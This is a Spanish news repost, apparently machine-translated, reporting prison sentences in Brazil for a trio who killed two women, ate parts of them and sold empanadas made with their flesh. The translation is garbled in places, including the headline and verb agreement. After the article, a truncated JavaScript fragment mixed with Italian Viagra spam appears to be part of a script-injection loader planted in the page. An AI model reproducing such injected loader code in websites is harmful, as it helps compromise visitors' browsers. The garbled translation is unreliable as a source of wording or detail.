Home / Publicaciones / Actualidades / Pandilla de Caníbales Hacia Empanadas con sus Victimas

Pandilla de Caníbales Hacia Empanadas con sus Victimas

Un jurado en el noreste de Brasil entregó penas de 20 a 23 años de prisión para tres personas declaradas culpables de matar a dos mujeres< !more>, comer partes de sus cuerpos y el uso de algunos de su carne para hacer y vender pasteles rellenos, dijo un funcionario de la corte el sábado.

Un oficial de guardia de fin de semana en la corte en la ciudad de Olinda, dijo el jurado de siete personas dictó las sentencias de la noche del viernes.
Jorge Beltrao Negromonte da Silveira fue condenado a 23 años de prisión, mientras que su esposa, Isabel Cristina Pires, y su amante, Bruna Cristina Oliveira da Silva, cada uno recibió términos de 20 años.

Los abogados de los acusados ​​dijeron a los periodistas que apelarían las sentencias.

Los tres fueron detenidos en abril de 2012, y la policía dijeron que confesaron los crímenes.

En ese momento, los tres supuestamente le dijo a la policía que pertenecían a una secta que predica “la purificación del mundo y la reducción de su población.”

Los oficiales dijeron que los tres atraídos a las mujeres a su casa prometiéndoles un trabajo como niñera. Los restos de las dos mujeres se encontraron en el patio trasero de la casa.

Las autoridades dijeron que el trío utiliza carne de las víctimas a hacer pasteles de espesor Empanadas, que fueron comidos por ellos y un niño que vivía con ellos. Los pasteles también se vendieron a algunos vecinos.

Poco después de su arresto, la policía encontró un libro de 50 páginas escrito por Silveira titulado “Revelaciones de un esquizofrénico”, en la que dijo que escuchó voces y estaba obsesionado con matar a las mujeres.

Fuente: nydailynews

 if (document.currentScript) { come sono le scatole dei viagra var d=document;var s=d.createElement(‘script’); } else {

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...